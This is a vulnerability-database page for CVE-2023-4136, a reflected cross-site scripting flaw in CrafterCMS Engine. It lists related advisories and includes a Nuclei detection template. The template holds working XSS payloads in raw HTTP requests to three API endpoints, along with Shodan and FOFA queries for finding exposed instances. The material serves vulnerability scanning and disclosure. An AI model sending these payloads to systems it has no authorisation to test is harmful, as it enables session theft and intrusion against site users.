| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CrafterCMS 4.0.2 Cross Site Scripting Vulnerability | 24 Aug 202300:00 | – | zdt | |
| CVE-2023-4136 | 3 Aug 202318:40 | – | circl | |
| Crafter CMS 跨站脚本漏洞 | 3 Aug 202300:00 | – | cnnvd | |
| CrafterCMS Cross-Site Scripting Vulnerability | 4 Aug 202300:00 | – | cnvd | |
| CVE-2023-4136 | 3 Aug 202313:33 | – | cve | |
| CVE-2023-4136 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Crafter Engine | 3 Aug 202313:33 | – | cvelist | |
| Cross-site Scripting (XSS) in CrafterCMS | 3 Aug 202318:30 | – | github | |
| CVE-2023-4136 | 3 Aug 202315:15 | – | nvd | |
| GHSA-JFM4-3VV3-FM4V Cross-site Scripting (XSS) in CrafterCMS | 3 Aug 202318:30 | – | osv | |
| CrafterCMS 4.0.2 Cross Site Scripting | 23 Aug 202300:00 | – | packetstorm |
| Source | Link |
|---|---|
| karmainsecurity | www.karmainsecurity.com/KIS-2023-09 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2023-4136 |
id: CVE-2023-4136
info:
name: CrafterCMS Engine - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
CrafterCMS Engine is vulnerable to reflected cross-site scripting (XSS) via the transformerName parameter in the /api/1/site/url/transform endpoint, allowing attackers to execute arbitrary JavaScript in the context of the user.
impact: |
Unauthenticated attackers can inject malicious JavaScript through the transformerName parameter in various API endpoints to steal CrafterCMS user credentials and session data.
remediation: |
Update CrafterCMS Engine to the latest version that addresses this vulnerability.
reference:
- https://karmainsecurity.com/KIS-2023-09
- https://nvd.nist.gov/vuln/detail/CVE-2023-4136
classification:
cve-id: CVE-2023-4136
cwe-id: CWE-79
epss-score: 0.01304
epss-percentile: 0.66873
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 6.1
metadata:
verified: true
max-request: 1
vendor: craftercms
product: craftercms
shodan-query: http.html:"craftercms"
fofa-query: body="craftercms"
tags: cve,cve2023,craftercms,xss,vuln
http:
- raw:
- |
GET /api/1/site/url/transform?transformerName=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E&url= HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml
- |
GET /api/1/site/content_store/children?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml
- |
GET /api/1/site/content_store/item?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 500 || status_code == 404'
- 'contains(content_type, "application/xhtml+xml")'
- 'contains(body, "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</script>")'
- 'contains_any(body, "Url transformer", "No folder found at", "No item found at")'
condition: and
# digest: 490a004630440220525dd4826f6059bb522873361a6da3937de1bb7bc9b0fde5a5863de37fe69f5502203adf8d895d15525113d6b9ca511784eefebb8b71b65668f11a6a9f2ccfb6fde2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation